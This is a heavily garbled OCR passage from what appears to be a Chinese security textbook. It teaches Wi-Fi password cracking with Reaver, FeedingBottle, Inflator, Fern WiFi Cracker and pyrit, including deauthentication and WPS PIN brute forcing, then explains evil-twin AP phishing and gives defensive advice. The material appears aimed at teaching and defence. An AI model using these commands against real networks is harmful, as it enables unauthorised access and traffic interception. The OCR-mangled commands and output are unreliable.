7 11:01:07--> 等 待 辣 令 中 
. A 停止 
已 民 出 
排序 pin 码 
NS 数量 :0 


选择 好 AP 后 单 击 Reaver 按 钮 ， 此 时 会 
弹出 一 个 Reaver 初 始 参 数列 表 对 话 框 ， 如 下 
图 所 示 。 


无 线 网 卡 路 由 MAC 名 种 强 魔 信道 ”加 窗 方 式 客户 澳 MIAC 
wulang wv | F4'83:CD:33:60:73_ 四. 谷 四 . 10_ 6 WPA2WPA 58:00:E3:B9-08:: 
wlanD Ralin 1C:FA-6B:O1:2F0B_Test-001__-71_1_ WPA2WPA__wps 
RT2870/ 3070 rt2800usb 
[phyd) 002F'DS9D9'02fD_ChinaNet5Wrc _ -65 13 WPA__ 
们 道 1C:60:DE:62:B84:0E 222 -65 13 WPA2 DD 向 子 爽 
A 
Al f minidwep-gtk A 
| 
加 蜜 方式 | 请 在 下 面 方 框 中 填 入 reaver 可 选 参数 : 1 启动 
WPA/WPA2 reaver -i mon1 -b 1CFA68:01:2F:08 -c 1 -5 /tmp/minidwep/1CFAG8D12F08.wpc 
-a -v -n -x 20 -r100:10-| 
-A Reave 
[4 [x Cancel 起 OK 
a 生僻 止 
上 退出 
排序 pin 码 


IV5 数 量 : 6 


启动 Reaver 开 始 破 解 PIN 码 ， 如 下 图 
所 示 。 


一 wlan0 mon1 1C:FA:68:01:2F:08 
+ tee /tmp/minidwep/1C:FA:B8:01:2F:08,109 


本 国画 国 


Reaver v1,.4 WiFi Protected Setup Attack Tool 
[Copuright (c) 2011, Tactical Network Solutions, Craig Heffner 《cheffnerBtacnetso 
] ,com> 


[+] Restored previous sessi 

[+] laiting for beacon da 1C:FA:68:01:2F:08 

[+] fssociated with 1C:FA:68:01:2F:08 (ESSID: Test-001) 
] Trying pin 01235678 

] Trying pin 01235678 

] Trying pin 01235678 

] Trying pin 01235678 

] Trying pin 01235678 

] Trying pin 01235678 

] 0.022 complete @ 2018-11-19 11:06:12 (0 seconds/pin) 
] Trying pin 01235678 

] Trying pin 11115670 

] Trying pin 22225672 

] Trying pin 33335674 

] Trying pin 44445676 

] 0.05z complete @ 2018-11-19 11:06:30 (8 seconds/pin) 
] Trying pin 44445676 


十 十 书 二 十 目 二 十 目 二 十 十 十 才 


Ee 


8.4.4 使 用 FeedingBotle 工 具 破 解 
WEP 密 码 


使 用 FeedingBottle 人 破解 WEP 密 人 码 可 以 使 
用 以 下 步骤: 
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双击 FeedingBottle 图 标 司 动 软件 ， 如 


yO 


下 图 所 示 。 


eedingBottle 


下 图 为 启动 后 的 界面 。 单 击 Yes 按 钮 
进入 下 一 步 。 


[step 图 在 无 线 网 卡 界 面 选择 无 线 网 卡 ， 如 下 
图 所 未 单 击 Next 按 钮 讲 入 下 一 步 。 


FeedingBottle fs ss 攻 - 汪 


” node anabled on ncra lulsrd) 


AP 扫描 界面 选择 AP 加 窗 方 式 信道 等 
配置 项 ， 单 击 Scan 按 钮 启动 打 描 ， 如 下 图 
所 示 。 


FeedingBottle Eee) 


选中 扫描 出 的 AP， 在 Clinets Information 
pa 示 出 接 入 AP 的 客户 站 Med 
所 示 。 单 击 Next 按 钮 进入 下 一 


FeedingBottle EH "se" 


ESSID: 1C:FA:68:01:2F :08 


破解 界面 有 4 种 方式 可 选 ， 这 里 同 
样 是 使 用 aireplay-ng 进 行 发 包 获 取 IVs 值 。 
如 果 没 有 获取 到 客户 端 握手 包 ， 可 以 单 去 
Deauth 按 钮 打 断 客户 端 与 AP 的 连接 ， 如 下 
图 所 示 ， 剩 下 的 时 间 等 待 足够 多 的 IVs 后 破 
解 出 密码 。 

FeedingBottle 


Clicnt NAC 


IC+6D*CI+*BS*FE*+*CB 


PRP REFLRY PTTACK 
PoB41 FEPLAY NTTPCK 
IDPCHOP _FOREE PTTRACH 


fdvanced Mode ->| 


8.4.5 ”使 用 FeedingBotle 工 具 破 解 
WPA/WPA2 密 码 
使 用 FeedingBottle 破 解 WPA/WPA2 密 码 
可 以 使 用 以 下 步骤 : 


[step 国 在 无 线 网 卡 界 面 选 择 无 线 网 卡 ， 如 下 
图 所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


Select lJireless [ard k Into Ncnitor Mode 


FecdineBottle 3,2,3 


将 加 密 方式 切换 为 WPA/WPA2， 并 单 
击 Scan 按钮 扫描 AP， 如 下 图 所 示 。 
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FeedingBottle 


选择 目标 AP 以 及 连接 AP 的 客户 端 ， 如 
下 图 所 示 。 单 击 Next 按 钮 进入 下 一 步 。 


FeedingBottle | 全 mo| 汪 名 


在 破解 页 面 中 会 有 AP 的 信息 ， 以 及 
接 入 AP 客户 端的 信息 ， 如 下 图 所 示 。 


FeedingBottle | ve 


单 击 Start 按 钮 ， 在 弹出 的 对 话 框 中 选 
择 一 个 字典 文件 ， 如 下 图 所 示 。 选 择 完 成 
后 单 击 OK 按钮 。 


Dictionary File Chooser 个 口 
Shou: 区 Files t*) ”| Favorites 了 | 


[¥ Previeu FF Show hidden files 


Filename: | /binfeadinabottle/passuword, lst 


RR Cancel | 
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通过 上 一 步 的 设置 ， 此 时 会 抓 取 握 手 
信息 ， 如 下 图 所 示 。 在 抓 包 过 程 中 需要 单 
击破 解 界 面 中 的 Deauth 按 钮 。 


3P intormation 


PhP HALC 


airodump-ng 


| 


CH 1 ][ Elapsed; 24 s J[ 2018-11-13 1¢;26 


B5511 PNR RU Beacons #]ata, #“s [LH HB ENL CIPHER AUTH E 
1C:FA:BB:01:2F 1:08 -lil27 4 142 0 D 1 Sde, WFA2 CCHP PSsk T 
E551D STATION FUR Rate Lost Frames Probe 


1C:FA:BB:01:2F :08 DCL:BD:CDBBFE:CB -27 V0-6 i 14 


step 加 ppg ] 担 手 信 息 后 ，FeedingBottle 
会 按照 字典 文件 开始 破解 ， 如 果 字 典 文件 
码 会 提示 更 换 字 典 文 件 ， 如 下 图 
所 示 。 


AP MAC 


iFrelIeSs r ard ] nfor nation 
- ace [ 


Passphrase not in dictionary! + 
Use arother dicticnary file? 


破解 出 密码 后 ， 下 方 WPA Key 会 给 出 
正确 的 黎 码 ， 如 下 图 所 示 。 


FeedingBottle 


FP infornation 

AP Nane AP NAC FP Channel Client IC 
lireless card 1irformat1ion 
Lard interface Lard monitor interface Lard MAC 


WPA handshake 


8.4.6 


使 用 Inflator 工 具 破 解 WPS 密 码 


使 用 Inflator 破 解 WPS 密 码 可 以 使 用 以 
下 步骤 : 
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双击 Inflator 图 标 启动 软件 ， 如 下 图 
所 示 。 


| 


启动 后 的 界面 如 下 图 所 示 ， 
按钮 。 


Inflator 1.0(for Reaver v1.4) 


从 网 卡 列 I 如 下 图 
人 示 。 单 击 Next 按 钮 进入 下 一 
Inflator 1.0(for Reaver v1.4) 


& Jnto Monitor Mode 


wland ES8tdE*Dbt23+ 全 :4 


Message: ge: [iry to enable nonitor mode, please wait,, | 


单 击 Scan for WPS enabled APs 按 和 钮 ， 
如 下 图 所 示 。 选 中 目标 AP， 单 击 Next 按 钮 
进入 下 一 

Inflator 1.0(for Reaver v1.4) 


3Ps Information 


Use scan modet-s) 图 
Ignore frame checksum errorst-C) 
lse 5pbHz W211 charmels -5) 


在 破解 WPS 界 面 中 ， 可 以 看 到 下 方 同 
和 Reaver 进 行 破解 ， 同 时 给 出 了 初始 
命令 ， 如 果 需 要 额外 添加 命令 可 以 名 选 上 
方 给 出 的 参数 ， 如 下 图 所 示 。 
pe Inflator 1.0(for Reaver v1.4) 


FP infornation 
AP Nams ”MAC 3P Channel 


ld 


hdwanced Options 


ee + 
| 由 围 3st the receive timeout period[5](-t) 
Bs 园 Set the delay between pin sttenpts [1](-d) 
a 


specif ied 4 or 8 digit WPS pint-p) 


time to wait if the AP locks UPS pin attempts [60]】 -1) 


tineout pericd [0,20](-1) 


| ee the em 
| 贺 5et the time to 


sleep after 10 unexpected failures [~x) 
图 -i. --hno-associate 图 -L --ignore-locks 图 -". --hnacl 5, —dh-small 
| 围 -E. --eap-terninate 图-N, --no-nacks 


httack Conmand iset the options Uou want below, without "~—vw" ): 


单 击 Run 按 钮 启动 Reaver 开 始 破 解 PIN 
如 下 图 所 元 - 


澡 
Reaver v1.4 WiFi Protected Setup Attack Tool 
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffnerBtacnetso 
] ,com> 


Reaver | 


[+] Waiting for beacon from 1C:FA:68:01:2F:08 

] WARNING: Failed to associate with 1C:FA:68:01:2F:08 (ESSID: Test-001) 
1] WARNING: Failed to associate with 1C:FA:68:01:2F:08 (ESSID: Test-001) 
] WARNING: Failed to associate with 1C:FA:B8:01:2F:08 (ESSID: Test-001) 
] WARNING: Failed to associate with 1C:FA:698:01:2F:08 (ESSIN: Test-001) 
] fssociated with 1C:FA:698:01:2F:08 (ESSID: Test-001) 

] Trying pin 12345670 

] WARNING: Failed to associate with 1C:FA:68:01:2F:08 (ESSID: Test-001) 
] WARNING: Failed to associate with 1C*FA:B8:01:2F:08 (ESSID: Test-001) 
] Trying pin 12345670 


| 
| 
| 
| 
+ 
+ 
| 
| 
+ 


[ 
[ 
[ 
[ 
[ 
[ 
[ 
[! 
[ 


实战 演练 1 一 一 使 用 Fern WiFi Cracker 
破解 AP 密 码 


对 于 喜欢 图 形 化 界面 的 用 户 来 说 ， 这 
是 一 球 福 利 工 具 ， 在 使 用 该 工具 之 前 ， 建 
议 手 动 关闭 那 些 可 能 影响 程序 正常 运行 的 
进程 。 

使 用 Fermm WiFi Cracker 破 解 AP 密 人 码 的 操 
作 步 又 如 下 : 
选择 “应 用 程序 ”菜单 列表 下 的 “无 
线 攻击 ”菜单 ， 在 无 线 攻击 菜单 中 有 fern 
WiFi， 如 下 图 所 示 。 


3.5 
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a rcrack-ng 


CNIrp 


cowpatty 
04 - 数据 库 评 估 软 件 
5 - 密码 攻击 


ghost phis... 
- 无线 攻击 ee 


选择 fern WiFi 选 项 ， 可 以 打开 该 工 
9 下 图 为 其 工作 界面 oO 
Fern WIFICracker © © 


出 wlanO Pr Refresh 


Monitor Mode Enabled on wlanOmo 


((%)) stcopped 


Lm | 


Fern WIFICracker 27 


| 
WILD WPA | 58 Detected 
EE 
Latest update is already installed 
. > 目 


| 
| Key Database No Key Entries 


长 
| ToolBox 
er 


GUI suits for wirelsss encryption strength testing of 802.11 wireless encryption standard access points 


Python Version: 2.7.15+ defay 
Aircrack Version: rcrack-nol4-{C)2 
QtVersion; 5.11.3 


About Fern WIFI Cracker 


Written by Saviour Emmanuel Ekiko Report Bugs at : savioboyz@rocketmail. com 


单 击 select Interface 右 侧 的 下 拉 按 钮 ， 
在 弹出 的 下 拉 列 表 中 选择 一 块 网 卡 ， 如 下 
图 所 示 。 


Select Interface < Refresh | 


Select an interface card 


[step 园 选择 完 网 卡 后 ， 会 弹出 一 个 提示 框 ， 
iw dd 如 下 图 所 示 。 


Tips - Scan settings @ 


To Access the "Settings" for the network scan preferences "Double click" 


on any area of the main window, "Scan for network button" is used to 


Y 


scan for network based on the settings options of the settings dialog 
Default is automated scan, Fake Mac-Address is always used 


Don't show this message again 


Lok | 


选择 完 网 卡 后 ， 单 击 下 方 的 “扫描 ” 
ry 开始 扫描 数据 信息 ， 如 下 图 所 示 。 


sa wlanO -| | 入 refresh Refresh OB Refresh | 


Monitor Mode Enabled on wlan0mon 


(¢°)) scan for Access points 
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扫描 过 程 中 ， 在 下 方 WEP 与 WPA 按 钮 
旁 ， 会 出 现 相 应 的 数字 信息 ， 这 些 数 字 代 表 
搜索 的 AP 数量 ， 如 下 图 所 示 。 


| ((*)) Active 
i 
Fi) wpPA 7 Detected 


单 击 WPA 按 钮 ， 即 可 进入 打 描 到 的 
AP 页 面 ， 如 下 图 所 示 。 


Attack Panel 会 


税 提 示 : 扫描 结果 页 面 大 致 分 为 以 下 几 个 
区 域 : 

(1) AP 列 表 。 这 里 会 以 列表 的 形式 列 
出 已 经 扫描 出 的 AP， 如 下 图 所 示 。 


(©) (€:)) (oN) f( 
LU “i “1 有 


ChinaNet-DvsG) ChinaNet-euKh ChinaNet-hUvyV Chinanet-KTIK9F ChinaNet-PvNs [本 
(2) 详细 数据 。 选 中 AP 列表 中 的 AP 以 
后 ， 下 方 会 列 出 该 AP 的 详细 信息 ， 如 下 图 
所 示 。 


(3) 破解 选项 。 这 里 会 有 常规 破解 和 
WPS 方 式 破解 两 个 选项 ， 如 下 图 所 示 。 
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(4) 破解 进度 区 。 该 区 域 左 侧 显 示 破 解 
步骤 、 下 方 是 破解 进度 条 、 右 侧 有 选择 密码 
文件 按钮 以 及 客户 端 列 表 ， 如 下 图 所 示 。 


robing s POINT 
-i password.lst | Brow 
authe atl 全 US 

st 


step 图 选中 需要 破解 的 AP， 查 看 是 否 有 
客户 端 接 入 ， 然 后 选择 密码 文件 ， 单 去 
Browse 按 钮 ， 如 下 图 所 示 。 


password.lst 


DC:6D:CD:66:FE:CB 


单 击 破解 Attack 按 钮 ， 这 时 按钮 的 文 
本 显示 会 换 成 Stop， 如 下 图 所 示 ， 如 果 需 要 
停止 破解 ， 可 以 单 击 Stop 按 钮 。 


面 Automate 


此 时 程序 会 尝试 中 断 AP 与 客户 端的 
连接 ， 如 下 图 所 示 。 


Probing Access Point 


Deauthenticating DC:6D:CD:66:FE:CB 


landshake Status 


当 抓 取 到 关联 信息 后 ， 开 始 破 解 ， 如 
下 图 所 示 。 而 且 抓 取 到 信息 文本 会 加 粗 颜 
色 并 变 成 黄色 来 显示 ， 没 有 抓 取 到 则 显示 
为 灰色 。 

Probing Access Point 


Deauthenticating DC:6D:CD:66:FE:CB 


Handshake Captured 


Bruteforcing WPA Encryption 


Finished 


破解 完成 后 会 提示 破解 出 的 密码 ， 如 
下 图 所 示 。 


Current Phrase 
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实战 演练 2 一 一 使 用 pyrit 工 具 破 解 AP 密码 


pyrit 是 一 球 开 源 且 完全 免费 的 软件 ， 任 何人 都 可 以 检查 ， 复 制 或 修改 它 。 它 在 各 种 平 
台 上 编译 和 执行 ， 包 括 FreeBSD、MacOS X 和 Linux 作 为 操作 系统 以 及 x86、alpha、arm 等 
处 理 胡 。 

使 用 pyrit 工 具 最 大 的 优点 ， 在 于 它 可 以 使 用 除 CPU 之 外 的 GPU 运算 加 速生 成 彩虹 表 ， 
本 身 支 持 抓 包 获取 四 步 握手 过 程 ， 无 须 使 用 airodump 抓 包 ， 如 果 已 经 通过 ariodump 抓 取 数 
据 ， 也 可 以 使 用 pyrit 进 行 读 取 。 

问题 : 什么 是 彩虹 表 ? 

答 : 彩虹 表 是 一 个 用 于 加 密 散 列 函 数 逆 运算 的 预先 计算 好 的 表 ， 为 破解 密码 的 散 列 值 
(或 称 哈 希 值 、 微 缩 图 、 摘 要 、 指 纹 、 哈 希 密 文 ) 而 准备 。 一 般 主 流 的 彩虹 表 都 在 100GB 
以 上 。 这 样 的 表 常 常用 于 恢复 由 有 限 集 字 符 组 成 的 固定 长 度 的 纯 文 本 密码 。 

使 用 pyrit 命 令 ， 查 看 pyrit 工 具 的 帮助 信息 ， 如 下 图 所 示 。 


root@kali:~# pyrit 

Pyrit 868.5.1 (C) 2008-2911 Lukas Lueg - 29015 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License V3+ 


Usage: pyrit [options] command 


Recognized options: 


b : Filters AccessPoint by BSSID 
-e : Filters AccessPoint by ESSID 
-h : Print help for a certain command 
-1 : Filename for input ('-' is stdin) 
-0 : Filename for output ('-' is stdout) 
-T : Packet capture source in pcap-format 
-U : URL of the storage-system to use 
--all-handshakes : Use all handshakes instead of the best one 
--aes : Use AES 

主要 参数 介绍 如 下 : 

e -b: 按 BSSID 和 吧 选 AccessPoint。 

e -e: 按 ESSID 过 滤 AccessPoint。 

e -h: 打印 某 个 命令 的 帮助 。 

e -i: 输入 的 文件 名 〈' - ' 是 stdin) 。 

e -0: 输出 的 文件 名 〈' - ' 是 stdout) 。 

e -I: pcap 格 式 的 数据 包 捕 获 源 。 

e -u: 要 使 用 的 存储 系统 的 URL。 

e --all-handshakes: 使 用 所 有 的 握手 ， 而 不 是 最 好 的 握手 。 


e aes: 使 用 AES。 

EE 具 可 识别 的 命令 如 下 : 

e analyze: 分 析 数 据 包 捕 获 文件 。 

attack_batch: 攻击 从 数据 库 的 PMKs /密码 握手 。 
attack cowpatty: 攻击 一 个 来 自 cowpatty 文 件 的 PMK 握 手 。 
attack db: 攻击 与 数据 库 中 的 PMK 握 手 。 
attack_passthrough: 用 文件 中 的 密码 攻击 握手 。 
batch: 批 处 理 数 据 库 。 
benchmark: 确定 可 用 内 核 的 性 能 

benchmark long: 更 长 和 更 准确 的 基准 版 本 。 
check db: 检查 数据 库 是 否 有 和 错误。 
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create_essid: 创建 一 个 新 的 ESSID。 

delete essid: 从 数据 库 中 删除 一 个 ESSID。 

eval: 计算 可 用 密码 和 匹配 结果 。 

export_cowpatty: 将 结果 导出 到 新 的 cowpatty 文 件 。 

export hashdb: 将 结果 导出 到 airolib 数 据 库 。 

export passwords: 将 密码 导出 到 文件 。 

help: 打印 一 般 帮 助 。 

import passwords: 从 类 文件 源 导 入 密码 。 

import unique _ passwords: 从 类 文件 源 导 入 唯一 密码 。 

list_cores: 列 出 可 用 的 核心 。 

list essids: 列 出 所 有 ESSID， 但 不 计 入 匹配 结果 。 

passthrough: 计算 PMK 并 将 结果 写 入 文件 。 

relay: 通过 RPC 中 继 一 个 存储 URL。 

selftest: 测试 硬件 以 确保 其 计算 正确 的 结果 。 

serve: 为 其 他 pyrit 客 户 提供 本 地 硬件 。 

strip: 将 数据 包 捕 获 文件 剥离 到 相关 数据 包 中 。 

stripLive: 捕获 来 自 现 场 捕获 源 的 相关 数据 包 。 

verify: 通过 重新 计算 ， 验 证 结果 的 10% 。 
使 用 pyrit 进 行 破解 无 线路 由 器 密码 的 操作 步骤 如 下 : 

使 用 pyrit -r wlan0mon -o wpa.cap stripLive 命 令 ， 开 始 抓 取 数据 包 ， 如 下 图 所 示 。 

rootG@kaLi:-~-# pyrit -r wLangmon -0 wpa.cap stripLive 

Pyrit 9.5.1 (C) 2998-2611 Lukas Lueg - 2915 John Mora 


https://github.com/JPaulMora/Pyrit 
This code is distributed under the GNU General Public License v3+ 


Parsing packets from 'wLangmon ' . . . 

1/1: New AccessPoint 50:2b:73:c4:72:56 (' 哇 味 味 ! 这 里 没 WiFi 哦 ! ') 
2/2: New AccessPoint e4:68:a3:7d:37:92 ('CMCC-X] ' ) 

3/3: New AccessPoint f4:83:cd:33:60:73 (' ') 

3/7: New Station 30:84:54:d6:ca:b9 (AP e4:68:a3:7d:37:92) 
4/8: New AccesspPoint 94:88:5e:0a:1b:82 ('@ 引 和 98 ' ) 

5/12: New AccessPoint 86:83:cd:33:60:73 ('TPGuest 6073 ' ) 
6/17: New AccessPoint lc:fa:68:01:2f:08 ('Test-001' ) 
7/27: New AccessPoint e4:68:a3:7d:37:90 ('CMCC') 

8/29: New AccessPoint e4:68:a3:7d:37:91 ('and-Business') 
9/39: New AccessPoint e4:68:a3:7d:37:95 ('A') 


[step 图 使 用 pyrit -r wpa.cap analyze 命 令 ， 对 抓 取 到 的 数据 包 进 行 分 析 ， 如 下 图 所 示 。 可 以 
看 到 ，Test-001 这 个 路 由 有 四 步 担 手 的 过 程 。 


root@kali:~# pyrit -r wpa.cap anaLyze 

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License V3+ 


Parsing file 'wpa.cap' (1/1)... 
Parsed 82 packets (82 802.1l-packets), got 41 AP(S) 
#24: AccessPoint 1lc:fa:68:01:2f:08 ('Test-001' ) : 
#1: Station dc:6d:cd:66:fe:cb, 2 handshake(s): 
#1: HMAC SHA1L AES, good*, spread 1 
#2: HMAC SHA1L AES, workable*, spread 25 
#25: AccessPoint e4:68:a3:7c:85:31 ('and-Business' ) : 


如 果 想 要 使 用 ariodump 抓 取 的 数据 包 ， 可 以 使 用 pyrit -r 001-01.cap -o pyritwpa.cap 
strip 命 令 ， 将 alrodump 的 数据 包 做 一 个 格式 转换 ， 如 下 图 所 示 。 
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root@kali:-~# pyrit -r 601-01.cap -0 pyritwpa.cap strip 

Pyrit 0.5.1 (C) 20608-20]11 Lukas Lueg - 2015 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License v3+ 


Parsing file '06901-01.cap' (1/1)... 
Parsed 53 packets (53 802.11-packets)，got 1 AP(s) 


#1: AccessPoint 1lc:fa:68:01:2f:08 ('Test-001') 
#0: Station dc:6d:cd:66:fe:cb, 1 handshakel(s) 
#1: HMAC SHA1 AES, good*, spread 1 


New pcap-file 'pyritwpa.cap'′ written (17 out of 53 packets) 


使 用 pyrit -< 抓 取 的 数据 包 文件 >-i< 密 码 文 件 >-b<AP-MAC 地 址 > attack passthrough 命 
令 ， 开 始 破解 密码 ， 这 里 破解 出 的 密码 为 Password， 如 下 图 所 示 。 


root@kali:~# pyrit -r wpa.cap -i /usr/share/john/password.lst -b lc:fa:68:01:2f:08 
attack passthrough 

Pyrit 9.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Public License v3+ 


Parsing file 'wpa.cap' (1/1)... 
Parsed 82 packets (82 802.11l-packets), got 41 AP(s) 


Tried 647 PMKs so far; 718 PMKs per second,. #!comment: This List has been compiled 
by Solar Designer of Ope 


The password is 'Password'. 


8.6 “小 试 身 手 


练习 1: 熟悉 aircrack-ng 工 具 套件 。 

练习 2: 使 用 aircrack-ng 破 解 WEP、WPA 以 及 WPS 密 人 码 。 
练习 3: 使 用 图 形 化 工具 破解 WEP 密 码 。 

练习 4: 使 用 CDlinux 系 统 工 具 破 解 无 线路 由 器 密码 。 


143 


ie 9.1.1 


oF 
Tp hh 
pr HT 
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通过 扫描 探测 可 以 发 现 附 近 AP 人 信息， 通过 这 些 AP 信 息 可 以 虚拟 出 一 个 与 AP 信息 完全 
相同 的 AP， 这 样 做 可 以 实现 信息 过 滤 ， 也 能 在 一 定 程 度 上 起 到 保护 AP 的 作用 。 


9.1 虚拟 AP 技术 


虚拟 AP 技术 相当 于 使 用 计算 机 设备 
通过 软件 模拟 AP， 通 过 计算 机 可 以 设置 
DHCP 服 务 器 ， 接 入 AP 的 网 络 设 备 通过 计 
算 机 共享 上 网 。 


认识 虚拟 AP 技术 
虚拟 AP 技术 从 Windows 7 操作 系统 开始 


就 存在 了 。 要 想 实现 虚拟 AP， 需 要 用 户 的 


计算 机 准备 两 块 网 卡 ， 一 块 有 线 网 卡 ， 一 
块 无 线 网 卡 ， 其 中 ， 有 线 网 卡 用 来 上 网 ， 
无 线 网 卡 用 来 发 射 信号 。 这 样 一 旦 有 设备 
接 入 虚拟 AP， 就 可 以 通过 抓 包 的 方式 来 查 


信号 ， 迫 使 无 线 客 户 端 连接 到 伪 AP， 这 是 
因为 无 线 客 户 端 通常 会 选择 信号 比较 强 或 
者 信 品 比 (SNR) 低 的 AP 进行 连接 。 

为 了 使 客 尸 端 连接 达到 无 颖 切换 的 效 
果 ， 伪 AP 应 该 以 桥接 方式 连接 到 男 外 一 个 
网 络 。 如 果 成 功 进行 了 攻击 ， 则 会 完全 控制 
无 线 客 户 端 网 络 连接 ， 并 且 可 以 发 起 任何 进 
一 步 的 攻击 。 发 起 无 线 钓鱼 攻击 的 黑客 一 般 
会 采取 以 下 步骤 来 最 终 控 制 终端 设备 。 


1. 获取 无 线 网 络 的 客 铀 


对 于 采用 WEP 或 WPA 认 证 的 无 线 网 
络 ， 黑 客 可 以 通过 无 线 破解 工具 ， 或 者 采用 
社会 工程 的 方法 ， 来 罚 取 目标 无 线 网 络 的 密 


看 该 设备 的 网 络 通信 数据 了 。 钥 ， 对 于 未 加 密 的 无 线 网 络 则 可 以 省 略 这 一 
虚拟 AP 技术 主要 是 用 来 网 络 共 享 的 ， 步骤， 使 得 无 线 钓 鱼 攻 击 更 容易 得 手 。 


如 果 当 前 只 能 一 台 计 算 机 上 网 ， 这 个 方 
法 可 以 实现 不 同 设 备 共 享 计 算 机 的 有 线 网 
络 ， 但 同时 也 可 能 成 为 黑客 恶意 攻击 的 一 
种 方法 。 当 然 随 着 无 线 网 的 发 展 ， 虚 拟 AP 
己 经 由 主要 的 网 络 共 享 转变 为 多 种 功能 ， 
例如 通过 接 入 虚拟 AP 来 抓 取 网 络 数据 包 ， 
对 于 网 络 分 析 是 非常 有 帮助 的 。 

除 Windows 系 统 可 以 虚拟 AP 外 ，Kali 
Linux 系 统 同 样 也 可 以 虚拟 AP， 并 且 通 过 
Kali Linux 系 统 还 可 以 完全 模拟 AP 的 整个 转 


2. 伪造 目标 无 线 网 络 


用 户 终端 在 接 入 一 个 无 线 网 络 之 前 ， 
系统 会 日 动 扫描 周围 环境 中 是 否 存 在 曾 
经 连接 过 的 无 线 网 络 。 当 存在 这 样 的 网 
络 时 ， 系 统 会 自动 连接 该 无 线 网 络 ， 并 自 
动 完 成 认证 过 程 ; 当 周 围 都 是 陌生 的 网 络 
时 ， 需 要 用 户 手工 选择 一 个 无 线 网 络 ， 并 
输入 该 网 络 的 密 钥 ， 完 成 认证 过 程 。 

黑客 在 伪造 该 无 线 网 络 时 ， 在 目标 无 
线 网 络 附 近 架 设 一 台 相 同 或 近似 SSID 的 
AP， 并 设置 之 前 视 取 的 无 线 网 络 密 铀 ， 这 


i 9.1.2 


iT 
EE: A 
fh 


防范 虚拟 AP 的 钓鱼 攻击 

伪 AP 和 钓鱼 攻击 ， 是 通过 仿照 正常 的 
AP， 搭 建 一 个 伪 AP， 然 后 通过 对 合法 AP 进 
行 拒 绝 服务 攻击 或 者 提供 比 合法 AP 更 强 的 


台 伪 AP 一 般 会 设置 成 可 以 桥接 的 软 AP， 因 
此 更 加 隐蔽 ， 不 容易 被 人 发 现 ， 这 样 ， 黑 
客 伪造 AP 的 工作 就 完成 了 。 

由 于 伪造 的 AP 采用 了 相同 的 SSID 和 


网 络 密 铀 ， 对 用 户 来 说 基本 上 很 难 进行 
辨别 ， 并 且 由 于 伪造 AP 使 用 了 高 增益 天 
线 ， 附 近 的 用 户 终端 会 接收 到 较 强 的 无 线 
信号 ， 此 时 在 用 户 终端 上 的 无 线 网 络 列 表 
中 ， 这 个 伪造 的 AP 要 优 于 正常 AP 排 在 靠 前 
的 位 置 。 这 样 ， 用 户 就 很 容易 上 当 ， 掉 入 
这 个 被 精心 构造 的 陷阱 中 。 


3. 干扰 合法 无 线 网 络 


对 于 那些 没有 自动 上 钩 的 移动 终端 ， 
为 了 使 其 主动 走 进 布 好 的 陷阱 ， 黑 客 会 对 
附近 合法 的 网 络 发 起 无 线 攻 击 ， 使 得 这 些 
无 线 网 络 处 于 瘫 次 状态 。 这 时 ， 移 动 终端 
会 发 现 原 有 无 线 网 络 不 可 用 ， 重 新 扫描 无 
线 网 络 ， 并 主动 连接 附近 无 线 网 络 中 信号 
强度 最 好 的 AP。 

由 于 其 他 AP 都 不 可 用 ， 并 且 黑 客 伪 
造 的 钓鱼 AP 信号 强度 又 比较 高 ， 移 动 终端 
会 主动 与 伪造 的 AP 建立 连接 ， 并 获取 了 IP 了 地 
址 。 至 此 ， 无 线 钓鱼 的 过 程 就 完成 了 。 


4. 截获 流量 或 发 起 进一步 攻击 


无 线 钓 鱼 攻击 完成 后 ， 移 动 终端 就 与 
黑客 的 攻击 系统 建立 了 连接 ， 由 于 黑客 采 
用 了 具有 桥接 功能 的 软 AP， 可 以 将 移动 终 
端的 流量 转发 至 Internet， 因 此 移动 终端 仍 
能 继续 上 网 ， 但 此 时 ， 所 有 数据 已 经 被 黑 
客 尽 收 眼 底 。 

黑客 会 捕获 这 些 数据 并 进一步 处 理 ， 
如 果 使 用 中 间 人 攻击 工具 ， 甚 至 可 以 截获 
采用 了 SSL 加 密 的 g-mail 邮 箱 信 息 ， 而 那些 
未 加 密 的 信息 更 是 一 览 无 余 。 

更 进一步 ， 由 于 黑客 的 攻击 系统 与 被 
钓鱼 的 终端 建立 了 连接 ， 黑 客 可 以 寻找 可 
利用 的 系统 漏洞 ， 并 截获 终端 的 DNS/URL 
请 求 ， 返 回 攻击 代码 ， 给 终端 植 入 木马 ， 
达到 最 终 控制 用 户 终 端的 目的 。 此 时 ， 连 
接 在 终端 的 设备 可 能 被 黑客 完全 控制 ， 致 
使 危害 进一步 扩大 。 


第 9 章 ”无线 网 络 中 的 虚拟 AP 技 术 


9.1.3 ”无线 网 络 安全 建议 


针对 当前 无 线 网 络 的 安全 问题 ， 下 面 贺电 


给 出 一 些 无 线 网 络 安全 的 建议 : 

(1) 不 要 随意 接 入 免费 WiFi 设备 ， 这 
种 情况 下 用 户 的 所 有 个 人 信息 ， 包 括 账号 
密码 直接 可 以 被 拦截 并 镭 取 。 

(2) 计算 机 或 者 手机 尽量 安装 安全 软 
件 ， 这 样 可 以 最 大 程度 减低 安全 风险 。 

(3) 修改 无 线路 由 器 默认 管理 账户 ， 
不 要 使 用 admin 或 root 等 明显 字眼 。 

(4) 设置 无 线路 由 器 的 加 密 方式 为 
WPA/WPA2。 因 为 如 果 是 WEP 加密 方 式 ， 
无 论 密码 多 长 ， 都 会 很 容易 被 破解 。 

(5) 设置 安全 强度 比较 大 的 无 线 WiFi 
密码 ， 最 好 包含 数字 、 字 母 、 大 小 写 、 特 
殊 字 符 等 ， 并 且 需 要 10 位 以 上 的 组 合 ， 例 
如 W@Xwod@#…。 

(6) 开启 MAC 地 址 过 滤 功 能 ， 只 绑 定 
自己 的 手机 、 计 算 机 、 平 板 计算 机 等 ， 如 
果 是 陌生 人 想 要 加 入 自己 的 无 线路 由 器 ， 
需要 授权 后 ， 才 可 以 连接 。 

(7) 开启 家 长 控制 功能 ， 只 允许 本 地 
